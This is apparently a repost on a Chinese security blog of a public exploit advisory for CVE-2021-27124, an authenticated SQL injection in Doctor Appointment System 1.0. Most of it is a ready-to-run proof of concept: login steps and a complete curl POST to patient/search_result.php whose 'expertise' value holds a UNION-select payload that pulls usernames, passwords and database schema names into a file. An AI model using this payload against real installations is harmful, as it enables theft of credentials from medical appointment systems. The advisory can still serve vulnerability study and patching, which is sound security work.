CVE-2021-27124_Doctor_Appointment_System_1.0_SQL注入漏洞

# CVE-2021-27124 Doctor Appointment System 1.0 SQL注入漏洞

# Exploit Title: Doctor Appointment System 1.0 - Authenticated SQL Injection
# Date: 2021-02-09
# Exploit Author: Soham Bakore, Nakul Ratti
# Vendor Homepage:
https://www.sourcecodester.com/php/14182/doctor-appointment-system.html
# Software Link:
https://www.sourcecodester.com/php/14182/doctor-appointment-system.html
# Version: V1.0


Vulnerable File:
----------------
http://host/patient/search_result.php

Vulnerable Issue:
-----------------
Expertise parameter has no input validation

POC:
----
1] Login as a normal patient user
2] Insert cookie after successful login in the below command:
curl -i -s -o tmp -k -X $'POST' \
    -H $'Host: 192.168.1.12' -H $'Content-Type:
application/x-www-form-urlencoded' -H $'Content-Length: 288' -H
$'Connection: close' -H $'Cookie: PHPSESSID=b85jccq5ns65d75g69j2uj37hf' -H
$'Upgrade-Insecure-Requests: 1' \
    -b $'PHPSESSID=b85jccq5ns65d75g69j2uj37hf' \
    --data-binary
$'expertise=Bone\'+union+select+concat(\'Username-\',username),2,3,(select+(%40a)+from+(select(%40a%3a%3d0x00),(select+(%40a)+from+(information_schema.schemata)where+(%40a)in+(%40a%3a%3dconcat(%40a,schema_name,\'
\'))))a),concat(\'Password\',\'-\',password),6,7,8,9,10,11,12+from+users%23&submit=' \ $'http://host/patient/search_result.php' 3] Check the tmp file for sensitive information from the database. ------------------
© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容